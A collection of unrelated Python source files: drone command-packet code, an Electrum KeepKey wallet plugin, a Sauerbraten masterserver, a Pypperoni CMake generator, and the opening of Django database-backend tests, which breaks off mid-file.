self.send_single_pcmd_command(command_tuple, roll, pitch, yaw, vertical_movement)
self.smart_sleep(0.1)
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
def send_fly_relative_command(self, command_tuple, change_x, change_y, change_z, change_angle):
"""
Send the packet to fly relative (this is Bebop only).
:param command_tuple: command tuple per the parser
:param change_x: change in x
:param change_y: change in y
:param change_z: change in z
:param change_angle: change in angle
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHffff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
27,
command_tuple[0], command_tuple[1], command_tuple[2],
change_x, change_y, change_z, change_angle)
self.safe_send(packet)
def send_turn_command(self, command_tuple, degrees):
"""
Build the packet for turning and send it
:param command_tuple: command tuple from the parser
:param degrees: how many degrees to turn
:return: True if the command was sent and False otherwise
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHh",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
13,
command_tuple[0], command_tuple[1], command_tuple[2],
degrees)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def send_camera_move_command(self, command_tuple, pan, tilt):
"""
Send the packet to move the camera (this is Bebop only).
:param command_tuple: command tuple per the parser
:param pan:
:param tilt:
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
packet = struct.pack("<BBBIBBHff",
self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'],
19,
command_tuple[0], command_tuple[1], command_tuple[2],
pan, tilt)
self.safe_send(packet)
def send_enum_command_packet_ack(self, command_tuple, enum_value, usb_id=None):
"""
Send a command on the ack channel with enum parameters as well (most likely a flip).
All commandsandsensors except PCMD go on the ack channel per
http://forum.developer.parrot.com/t/ble-characteristics-of-minidrones/5912/2
the id of the last command sent (for use in ack) is the send counter (which is incremented before sending)
:param command_tuple: 3 tuple of the command bytes. 0 padded for 4th byte
:param enum_value: the enum index
:return: nothing
"""
self.sequence_counter['SEND_WITH_ACK'] = (self.sequence_counter['SEND_WITH_ACK'] + 1) % 256
if (usb_id is None):
packet = struct.pack("<BBBIBBHI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 15,
command_tuple[0], command_tuple[1], command_tuple[2],
enum_value)
else:
packet = struct.pack("<BBBIBBHBI", self.data_types_by_name['DATA_WITH_ACK'],
self.buffer_ids['SEND_WITH_ACK'],
self.sequence_counter['SEND_WITH_ACK'], 16,
command_tuple[0], command_tuple[1], command_tuple[2],
usb_id, enum_value)
return self.send_command_packet_ack(packet, self.sequence_counter['SEND_WITH_ACK'])
def smart_sleep(self, timeout):
"""
Sleeps the requested number of seconds but wakes up for notifications
Note: time.sleep misbehaves for the BLE connections but seems ok for wifi.
I encourage you to use smart_sleep since it handles the sleeping in a thread-safe way.
:param timeout: number of seconds to sleep
:return:
"""
start_time = datetime.now()
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
while (diff < timeout):
time.sleep(0.1)
new_time = datetime.now()
diff = (new_time - start_time).seconds + ((new_time - start_time).microseconds / 1000000.0)
def ack_packet(self, buffer_id, packet_id):
"""
Ack the packet id specified by the argument on the ACK_COMMAND channel
:param packet_id: the packet id to ack
:return: nothing
"""
#color_print("ack: buffer id of %d and packet id of %d" % (buffer_id, packet_id))
new_buf_id = (buffer_id + 128) % 256
if (new_buf_id not in self.sequence_counter):
self.sequence_counter[new_buf_id] = 0
else:
self.sequence_counter[new_buf_id] = (self.sequence_counter[new_buf_id] + 1) % 256
packet = struct.pack("<BBBIB", self.data_types_by_name['ACK'], new_buf_id,
self.sequence_counter[new_buf_id], 8,
packet_id)
self.safe_send(packet)
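# Hedged sketch of the ack buffer arithmetic above: acks are sent on buffer
# (incoming buffer id + 128) % 256, so a DATA_WITH_ACK frame received on
# buffer 11 ('SEND_WITH_ACK') is acknowledged on buffer 139, which matches
# the 'ACK_FROM_SEND_WITH_ACK' entry in self.buffer_ids:
#
# >>> (11 + 128) % 256
# 139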
|
plugin.py
|
from binascii import hexlify, unhexlify
from electrum.util import bfh, bh2u
from electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum import constants
from electrum.i18n import _
from electrum.plugins import BasePlugin
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never return when a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bithereum"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in ('standard',):
raise ScriptTypeNotSupported(_('This type of script is not supported with KeepKey.'))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.is_segwit())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.is_segwit())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
segwit = wallet.keystore.is_segwit()
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, segwit=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDP2SHWITNESS if segwit else self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, segwit=False):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOP2SHWITNESS if segwit else self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
if is_segwit_address(address):
txoutputtype.script_type = self.types.PAYTOWITNESS
else:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
masterserver.py
|
#!/usr/bin/env python
from threading import Thread
import socket
import time
from time import gmtime, strftime
import os
import sys
import string
class masterserver(object):
settings = {
"host": "sauerbraten-fork.org",
"port": 28787,
"log": "master.log"
}
proxy = {
"host": "sauerbraten.org",
"port": 28787
}
servers = []
shutdown = False
logfile = None
serv = None
updatesecs = 60
def log(self, text):
if self.logfile is None:
# "a" appends to an existing log and creates the file if it is missing
self.logfile = open(self.settings["log"], "a")
self.logfile.write("\n" + time.strftime("[%a %m/%d/%Y %H:%M:%S] ") + text)
self.logfile.flush()
def getserversfromproxy(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self.proxy["host"], self.proxy["port"]))
s.send('list\n')
data = ""
while True:
bucket=s.recv(512)
if not bucket:
break
else:
data += bucket
s.close()
return data
except socket.error, msg:
self.log("PROXY: error in connecting to masterserver %s:%s" %(self.proxy["host"], self.proxy["port"]))
s.close()
s = None
except socket.error, msg:
self.log("PROXY: error in creating socket")
s = None
return 'echo "error connecting remote masterserver %s:%s"' %(proxy_hostname, proxy_port)
def getlocalservers(self):
s_str = ""
for server in self.servers:
if s_str == "":
s_str = "addserver %s %s\n" %(server["ip"], server["port"])
else:
s_str = "%saddserver %s %s\n" %(s_str, server["ip"], server["port"])
return s_str
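# Hedged sketch of the string built above, one 'addserver' line per
# registered server (the addresses below are hypothetical):
#
# addserver 203.0.113.5 28785
# addserver 203.0.113.9 28785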
def register(self, ip, port):
server = {
"ip": ip,
"port": port
}
already = False
for s in self.servers:
if s["ip"] == server["ip"] and s["port"] == server["port"]:
already = True
if not already:
self.servers.append(server)
return True
def unregister(self, ip, port):
server = {
"ip": ip,
"port": port
}
# iterate over a copy since entries may be removed while looping
for s in list(self.servers):
if s["ip"] == server["ip"] and s["port"] == server["port"]:
self.servers.remove(s)
def acceptclient(self, infos):
if self.shutdown:
return
self.log("accepted a connection: " + str(infos[1]))
con = infos[0]
cid = str(infos[1][1])
ip = str(infos[1][0])
data = con.recv(4096)
if data == "list\n":
serverstr = "%s%s" %(self.getlocalservers(), self.getserversfromproxy())
con.send(serverstr)
#self.log("=== successfully sent server list ===")
#self.log(serverstr)
#self.log("=== successfully sent server list ===")
else:
if data[0:7] == "regserv":
port = data[8:].replace("\n","").replace("\r","")
if self.register(ip, port):
self.log("successfully registered server %s %s" %(ip, port))
con.send("succreg\n")
i = 0
# hold the connection open for updatesecs seconds (counting the sleeps)
while i < self.updatesecs and not self.shutdown:
time.sleep(1)
i += 1
else:
self.log("failed to register server %s %s" %(ip, port))
con.send("failreg\n")
else:
self.log("client wanted something unknown: %s" %(data))
self.log("request done")
# con.send("");
con.close()
def initsocket(self):
i = 0
while i < 5:
i = i + 1
try:
self.log("starting...")
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.serv.bind((self.settings["host"], self.settings["port"]))
#self.serv.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#self.serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.serv.listen(1)
return True
except:
self.log("ERROR socket initialization failed, retrying in 5 seconds")
time.sleep(5)
return False
def main(self):
if not self.initsocket():
self.log("could not start masterserver: hostname or port error")
print "could not start masterserver: hostname or port error"
return
else:
self.log("port binding succeeded...")
print "waiting for clients ..."
while True:
try:
infos = self.serv.accept()
try:
temp_thread = Thread(target=self.acceptclient, args=(infos,))
temp_thread.start()
except:
pass
except:
self.log("shutdown...")
self.shutdown = True
self.logfile.close()
return
if __name__ == '__main__':
ms = masterserver()
ms.main()
|
cmake.py
|
# Copyright (c) Pypperoni
#
# Pypperoni is licensed under the MIT License; you may
# not use it except in compliance with the License.
#
# You should have received a copy of the License with
# this source code under the name "LICENSE.txt". However,
# you may obtain a copy of the License on our GitHub here:
# https://github.com/Pypperoni/pypperoni
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
from pypperoni.files import ConditionalFile, FileContainer
from pypperoni.module import Module, write_modules_file
from pypperoni.codeobj import write_frames_file
from pypperoni.util import safePrint
from threading import Thread, Lock
from Queue import Queue, Empty
import traceback
import hashlib
import math
import sys
import os
PYPPERONI_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
class CMakeFileGenerator:
def __init__(self, project, outputdir='build', nthreads=4):
self.project = project
self.outputdir = outputdir
self.nthreads = nthreads
self.modules = {}
self.__files = []
# shared lock protecting self.__files across worker threads
self.__files_lock = Lock()
self.cmake_in_file = os.path.join(PYPPERONI_ROOT, 'pypperoni', 'cmake.in')
self.add_directory(os.path.join(PYPPERONI_ROOT, 'python', 'Lib'))
self.generate_codecs_index()
def add_file(self, filename, name=None):
'''
Adds a single file to modules.
If name is not provided, it's inferred from filename:
path/to/file -> path.to.file
'''
with open(filename, 'rb') as f:
data = f.read()
if name is None:
name = os.path.normpath(filename.rsplit('.', 1)[0]).replace(os.sep, '.')
if name.endswith('.__init__'):
name = name[:-9]
self.add_module(name, data)
def add_module(self, name, data):
code = compile(data, name, 'exec')
self.modules[name] = Module(name, code)
def add_directory(self, path):
'''
Adds all Python files (.py) in a directory to modules.
For example,
dir1/
file1.py
file2.py
will add the modules "file1" and "file2"
'''
cwd = os.getcwd()
path = os.path.abspath(path)
os.chdir(path)
try:
for root, _, filenames in os.walk('.'):
for filename in filenames:
if filename.endswith('.py'):
self.add_file(os.path.join(root, filename))
finally:
os.chdir(cwd)
def add_tree(self, path):
'''
Adds all Python files (.py) in a directory to modules, preserving the tree name.
For example,
tree1/
file1.py
file2.py
will add the modules "tree1.file1" and "tree1.file2"
'''
cwd = os.getcwd()
path = os.path.abspath(path)
os.chdir(os.path.dirname(path))
try:
for root, _, filenames in os.walk(os.path.basename(path)):
for filename in filenames:
if filename.endswith('.py'):
self.add_file(os.path.join(root, filename))
finally:
os.chdir(cwd)
def generate_codecs_index(self):
data = 'from encodings import register_mod\n'
for k in self.modules:
if k.startswith('encodings.'):
name = k[10:]
data += 'from encodings import %s\n' % name
data += 'register_mod(%s)\n' % name
self.add_module('codecs_index', data)
@staticmethod
def hash_file(f):
sha = hashlib.sha256() # avoid shadowing the builtin 'hash'
while True:
data = f.read(8192)
if not data:
break
sha.update(data)
return sha.hexdigest()[:7]
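# Hedged usage sketch (the filename is hypothetical): hash_file takes an
# open binary file object and returns the first 7 hex digits of its SHA-256.
#
# with open('CMakeLists.txt', 'rb') as f:
#     short_hash = CMakeFileGenerator.hash_file(f)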
def __process_one(self, name, module):
prefix = os.path.join(self.outputdir, 'gen', 'modules', name)
f = FileContainer(prefix, self.hash_file)
module.generate_c_code(f, self.modules)
# use the shared lock; "with Lock()" created a fresh lock per call and
# therefore provided no mutual exclusion between worker threads
with self.__files_lock:
self.__files.extend(os.path.join('modules', os.path.basename(x[0])) for x in f.close())
def __worker(self):
while True:
try:
name, module, text = self.__queue.get_nowait()
except Empty:
break
safePrint(text)
error = False
try:
self.__process_one(name, module)
            except Exception:
                sys.stderr.write('Exception in thread:\n')
                sys.stderr.write(traceback.format_exc())
                error = True
finally:
self.__queue.task_done()
if error:
sys.stdout.flush()
sys.stderr.flush()
os._exit(1)
def run(self):
modules_dir = os.path.join(self.outputdir, 'gen', 'modules')
if not os.path.isdir(modules_dir):
os.makedirs(modules_dir)
self.__queue = Queue()
total = len(self.modules)
        n = int(math.floor(math.log10(total))) + 1
_format = '[%%%dd/%%%dd] %%s' % (n, n)
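        # Illustrative example: with total=120 modules, n == 3 and _format is
        # '[%3d/%3d] %s', producing progress lines like '[  7/120] encodings.utf_8'.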
i = 0
for name, module in self.modules.items():
i += 1
text = _format % (i, total, name)
self.__queue.put((name, module, text))
for i in xrange(self.nthreads):
t = Thread(target=self.__worker)
t.daemon = True
t.start()
self.__queue.join()
filename = os.path.join(self.outputdir, 'gen', 'modules.I')
f = ConditionalFile(filename, self.hash_file)
write_modules_file(f, self.modules)
self.__files.append(os.path.basename(f.close()[0]))
filename = os.path.join(self.outputdir, 'gen', 'frames.I')
f = ConditionalFile(filename, self.hash_file)
write_frames_file(f)
self.__files.append(os.path.basename(f.close()[0]))
files = ''
for filename in self.__files:
files += ' %s\n' % os.path.join('gen', filename).replace('\\', '/')
with open(self.cmake_in_file, 'rb') as f:
cmakein = f.read()
cmakein = cmakein.replace('$$project$$', self.project)
cmakein = cmakein.replace('$$files$$', files)
cmakein = cmakein.replace('$$pypperoni_root$$', PYPPERONI_ROOT.replace('\\', '/'))
with open(os.path.join(self.outputdir, 'CMakeLists.txt'), 'wb') as f:
f.write(cmakein)
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipIfDBFeature, skipUnlessDBFeature,
)
from django.utils import six
from django.utils.six.moves import range
from .models import (
Article, Item, Object, ObjectReference, Person, Post, RawData, Reporter,
ReporterProxy, SchoolClass, Square,
VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ,
)
class DatabaseWrapperTests(SimpleTestCase):
def test_initialization_class_attributes(self):
"""
The "initialization" class attributes like client_class and
creation_class should be set on the class and reflected in the
corresponding instance attributes of the instantiated backend.
"""
conn = connections[DEFAULT_DB_ALIAS]
conn_class = type(conn)
attr_names = [
('client_class', 'client'),
('creation_class', 'creation'),
('features_class', 'features'),
('introspection_class', 'introspection'),
('ops_class', 'ops'),
('validation_class', 'validation'),
]
for class_attr_name, instance_attr_name in attr_names:
class_attr_value = getattr(conn_class, class_attr_name)
self.assertIsNotNone(class_attr_value)
instance_attr_value = getattr(conn, instance_attr_name)
self.assertIsInstance(instance_attr_value, class_attr_value)
class DummyBackendTest(SimpleTestCase):
def test_no_databases(self):
"""
        An empty DATABASES setting defaults to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'], 'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
with connection.cursor() as cursor:
cursor.callproc('DBMS_SESSION.SET_IDENTIFIER', ['_django_testing!'])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# The query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
auto_increment fields are created with the AUTOINCREMENT keyword
in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual(
'integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1),
"Wrong SQL used to create an auto-increment column on SQLite"
)
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(aggregate('time'))
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(aggregate('date'))
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(aggregate('last_modified'))
with self.assertRaises(NotImplementedError):
Item.objects.all().aggregate(
**{'complex': aggregate('last_modified') + aggregate('last_modified')}
)
def test_memory_db_test_name(self):
"""
A named in-memory db should be allowed where supported.
"""
from django.db.backends.sqlite3.base import DatabaseWrapper
settings_dict = {
'TEST': {
'NAME': 'file:memorydb_test?mode=memory&cache=shared',
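                # SQLite URI filenames: mode=memory keeps the DB in memory and
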